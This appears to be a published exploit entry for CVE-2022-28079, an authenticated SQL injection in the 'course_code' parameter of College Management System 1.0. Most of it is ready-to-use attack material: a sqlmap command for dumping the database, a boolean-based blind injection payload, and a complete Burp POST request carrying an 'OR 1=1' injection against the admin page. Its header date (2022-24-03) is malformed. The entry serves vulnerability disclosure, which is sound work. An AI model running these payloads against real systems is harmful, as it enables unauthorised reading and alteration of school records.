# Exploit Title: College Management System - 'course_code' SQL Injection (Authenticated)# Date: 2022-24-03# Exploit Author: Eren Gozaydin# Vendor Homepage: https://code-projects.org/college-management-system-in-php-with-source-code/# Software Link: https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f# Version: 1.0# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51# CVE: CVE-2022-28079# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28079------------------------------------------------------------------------------------1. Description:----------------------
College Management System 1.0 allows SQL Injection via parameter 'course_code'in/College-Management-System/admin/asign-single-student-subjects.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data,or exploit latent vulnerabilities
in the underlying database.2. Proof of Concept:----------------------
In Burpsuite intercept the request from the affected page with'course_code' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:----------------------
boolean-based blind
Payload: submit=Press&roll_no=3&course_code=-6093' OR 2121=2121 AND 'ddQQ'='ddQQ
4. Burpsuite request:----------------------
POST /College-Management-System/admin/asign-single-student-subjects.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length:80
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=jhnlvntmv8q4gtgsof9l1f1hhe
Referer: http://localhost/College-Management-System/admin/asign-single-student-subjects.php
User-Agent: Mozilla/5.0(Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
submit=Press&roll_no=3&course_code=Select+Course%27+OR+1%3d1+OR+%27ns%27%3d%27ns
